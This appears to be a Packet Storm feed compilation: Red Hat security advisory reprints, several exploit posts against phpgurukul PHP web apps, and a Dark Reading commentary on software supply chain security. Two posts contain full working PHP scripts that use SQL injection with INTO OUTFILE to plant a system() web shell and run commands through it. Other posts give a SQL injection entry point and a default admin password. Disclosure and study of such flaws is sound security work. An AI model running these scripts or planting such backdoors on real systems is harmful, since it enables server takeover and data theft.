Red Hat Security Advisory 2024-6612-03 - An update for fence-agents is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6612.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: fence-agents security updateAdvisory ID:        RHSA-2024:6612-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6612Issue date:         2024-09-11Revision:           03CVE Names:          CVE-2024-6345====================================================================Summary: An update for fence-agents is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The fence-agents packages provide a collection of scripts for handling remote power management for cluster devices. They allow failed or unreachable nodes to be forcibly restarted and removed from the cluster. Security Fix(es):* pypa/setuptools: Remote code execution via download functions in the package_index module in pypa/setuptools (CVE-2024-6345)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6345References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2297771

Red Hat Security Advisory 2024-6612-03

Nipah Virus Testing Management System version 1.0 suffers from a php code injection vulnerability.

    =============================================================================================================================================| # Title     : Nipah virus (NiV) – Testing Management System 1.0 php code injection Vulnerability                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/nipah-virus-niv-testing-management-system-using-php-and-mysql/                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) {    $options = [        'http' => [            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",            'method'  => 'POST',            'content' => http_build_query($data),        ]    ];    $context  = stream_context_create($options);    return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/nipah-tms/';// مسار ثابت لرفع الملف$path = 'C:\www\nipah-tms\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",    'password' => 'test',    'login' => ''];send_request($url . "/login.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Nipah Virus Testing Management System 1.0 PHP Code Injection

Red Hat Security Advisory 2024-6611-03 - An update for fence-agents is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a code execution vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6611.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: fence-agents security updateAdvisory ID:        RHSA-2024:6611-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6611Issue date:         2024-09-11Revision:           03CVE Names:          CVE-2024-6345====================================================================Summary: An update for fence-agents is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The fence-agents packages provide a collection of scripts for handling remote power management for cluster devices. They allow failed or unreachable nodes to be forcibly restarted and removed from the cluster. Security Fix(es):* pypa/setuptools: Remote code execution via download functions in the package_index module in pypa/setuptools (CVE-2024-6345)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-6345References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2297771

Red Hat Security Advisory 2024-6611-03

Red Hat Security Advisory 2024-6610-03 - An update for git is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6610.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: git security updateAdvisory ID:        RHSA-2024:6610-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6610Issue date:         2024-09-11Revision:           03CVE Names:          CVE-2024-32002====================================================================Summary: An update for git is now available for Red Hat Enterprise Linux 9.0 Update Services for SAP Solutions.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Git is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.Security Fix(es):* git: Recursive clones RCE (CVE-2024-32002)* git: RCE while cloning local repos (CVE-2024-32004)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-32002References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2280421https://bugzilla.redhat.com/show_bug.cgi?id=2280428

Red Hat Security Advisory 2024-6610-03

Medical Card Generations System version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Medical Card Generations System 1.0 Sql injection Vulnerability                                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/medical-card-generation-system-using-php-and-mysql/                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : view-card-detail.php?viewid=1 <==== inject here [+] http://127.0.0.1/mcgs/view-card-detail.php?viewid=1Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Medical Card Generations System 1.0 SQL Injection

Maid Hiring Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Maid Hiring Management System 1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/maid-hiring-management-system-using-php-and-mysql/                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/mhms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Maid Hiring Management System 1.0 Insecure Settings

Red Hat Security Advisory 2024-6595-03 - An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 8. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6595.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: java-1.8.0-ibm security updateAdvisory ID:        RHSA-2024:6595-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6595Issue date:         2024-09-11Revision:           03CVE Names:          ====================================================================Summary: An update for java-1.8.0-ibm is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:IBM Java SE version 8 includes the IBM Java Runtime Environment and the IBM Java Software Development Kit.This update upgrades IBM Java SE 8 to version 8 SR8-FP15.Security Fix(es):* IBM JDK: Object Request Broker (ORB) denial of service (CVE-2023-38264)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:CVEs:References:https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-6595-03

Red Hat Security Advisory 2024-6584-03 - An update for httpd is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6584.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: httpd security updateAdvisory ID:        RHSA-2024:6584-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6584Issue date:         2024-09-11Revision:           03CVE Names:          CVE-2024-38476====================================================================Summary: An update for httpd is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd: Security issues via?backend applications whose response headers are malicious or exploitable (CVE-2024-38476)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38476References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2295015

Red Hat Security Advisory 2024-6584-03

Emergency Ambulance Hiring Portal version 1.0 suffers from a php code injection vulnerability.

    =============================================================================================================================================| # Title     : Emergency Ambulance Hiring Portal 1.0 php code injection Vulnerability                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) {    $options = [        'http' => [            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",            'method'  => 'POST',            'content' => http_build_query($data),        ]    ];    $context  = stream_context_create($options);    return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/eahp/';// مسار ثابت لرفع الملف$path = 'C:\www\eahp\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",    'password' => 'test',    'login' => ''];send_request($url . "/admin/login.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Emergency Ambulance Hiring Portal 1.0 PHP Code Injection

Understanding a threat is just as important as the steps taken toward prevention.

Ansh Patnaik, Senior Vice President of Product Management, CyCognito

September 12, 2024

5 Min Read

Source: Zonnar GmbH via Alamy Stock Photo

COMMENTARY

In recent years, software supply chain attacks have moved from the periphery of concerns to the forefront. According to Verizon's "2024 Data Breach Investigations Report," the use of vulnerabilities to initiate breaches surged by 180% in 2023, compared to 2022. Of those breaches, 15% involved a third party or supplier, such as software supply chains, hosting partner infrastructures, or data custodians. 

These statistics come as no surprise, given the impact of several high-profile vulnerabilities in 2023. 

SolarWinds is probably the biggest known example of a software supply chain attack to date. More than 18,000 organizations were affected, with some reports stating the attack cost those affected 11% of their revenue, on average.

Similarly, Okta also experienced a significant breach where threat actors accessed private customer data through its support management system. The breach went undetected for weeks, despite security alerts.

And let's not forget the drawn-out MOVEit Transfer tool attack, which affected more than 620 organizations, including major entities like the BBC and British Airways. Linked to the Cl0p ransomware group, the attack clearly emphasized the urgency of promptly patching vulnerabilities and securing Web-facing applications. 

A very important detail to note is that the ramifications of software supply chain attacks could be enduring, both from a technical threat and liability perspective. In October 2023, nearly three years after the notorious SolarWinds breach, the Securities and Exchange Commission (SEC) charged SolarWinds with misleading investors about its cybersecurity practices and risks. This charge followed a $26 million settlement of a securities class-action lawsuit related to the breach.

But to understand how these attacks occur and how they can be mitigated, it's important to first understand what software supply chain security is.

**Unpacking Software Supply Chain Security**

Gartner defines software supply chain security (SSCS) as a comprehensive framework encompassing the processes and tools necessary to curate, create, and consume software securely, thereby mitigating potential attacks on software or its use as an attack vector. This framework is structured around three core pillars:

1.  Curation: This step is all about evaluating third-party software components to assess their risks and determine if they're suitable for use. By doing this, organizations ensure that only secure and compliant components make their way into the software supply chain.
    
2.  Creation: This shows the importance of secure development practices and protecting both software artifacts and the development pipeline. It involves putting security measures in place throughout the software creation process to guard against vulnerabilities and potential threats.
    
3.  Consumption: This stage focuses on ensuring the integrity of the software by verifying its source, authenticity, and traceability. It ensures that the software being deployed is secure and has not been tampered with or modified without authorization.
    

In simpler terms, SSCS encompasses all the software components used and built into an organization's software, as well as the practices developers employ to write and monitor code post-deployment.

Gartner's efforts in this area are a direct result of what it deems to be an escalating threat. In fact, it projects that the financial impact of supply chain attacks will escalate from $40 billion in 2023 to $138 billion by 2031.

The US government is also taking measures, mandating that its suppliers provide a software bill of materials (SBOM), underscoring the need for transparency and accountability in the software supply chain.

**Building a Software Supply Chain Security Program**

Managing the risk of vulnerabilities during software development relies on two main processes: continuous code scanning throughout the software development life cycle (SDLC) and maintaining a highly automated SDLC to efficiently update, test, and deploy new software versions.

*   Continuous code scanning: It's crucial to implement continuous code scanning throughout the SDLC to catch vulnerabilities early. This involves using both static and dynamic application security testing (SAST and DAST) to ensure that both proprietary and third-party code are secure.
    
*   Automated SDLC: Keeping the SDLC highly automated is key to efficiently updating, testing, and deploying new software versions. Automation helps reduce human error and speeds up the process of identifying and fixing vulnerabilities.
    

Scanning third-party code with source code analysis (SCA) tools is essential in this context. SCA automates the detection and management of risks associated with third-party and open source software components. Here's what SCA can do:

*   Identify software components: SCA tools can pinpoint all the components within a software application, giving you a clear view of the software supply chain.
    
*   Generate software bills of materials (SBOM): SBOMs provide a list of all components and their metadata, helping organizations comply with regulatory requirements and manage open source licenses.
    
*   Scan for vulnerabilities: These tools scan for known vulnerabilities in software components, offering alerts and guidance for remediation.
    
*   Assess risks: They evaluate the risk level of each component, allowing organizations to prioritize remediation efforts based on the severity of the risk.
    
*   Generate dependency graphs: These graphs show the relationships between components, helping to identify potential points of failure or risk.
    
*   Provide remediation guidance: SCA tools offer actionable advice on how to fix identified vulnerabilities.
    
*   Automatically enforce policies: You can set policies to automatically block the use of components with known vulnerabilities or license issues.
    

External exposure management is also playing an increasingly critical role in supply chain security, with organizations adding more third-party services and building more Web apps using third-party components and libraries every day.

**The Future**

The financial impact of these attacks is projected to grow significantly, making it imperative for organizations to act now. 

The key moving forward is first awareness. Understanding the threat is as important as the steps toward prevention. Once this is established, there are ample resources and technologies to equip security teams with the reinforcements to protect their ecosystems.

**About the Author**

Senior Vice President of Product Management, CyCognito

Ansh Patnaik, senior vice president of product management of CyCognito, has more than 20 years of cross functional experience in cybersecurity and data analytics. Most recently, Ansh was director, cloud security products for Google Cloud Platform, and chief product officer for Chronicle, prior to the acquisition of Chronicle by Google. Previously, he was vice president of product management at Oracle Cloud, where he defined and launched its security analytics cloud service offering. Ansh has held product management, product marketing, and sales engineering leadership roles at several market leading software companies, including Delphix, ArcSight (acquired by HP), and BindView (acquired by Symantec).

Tag

#vulnerability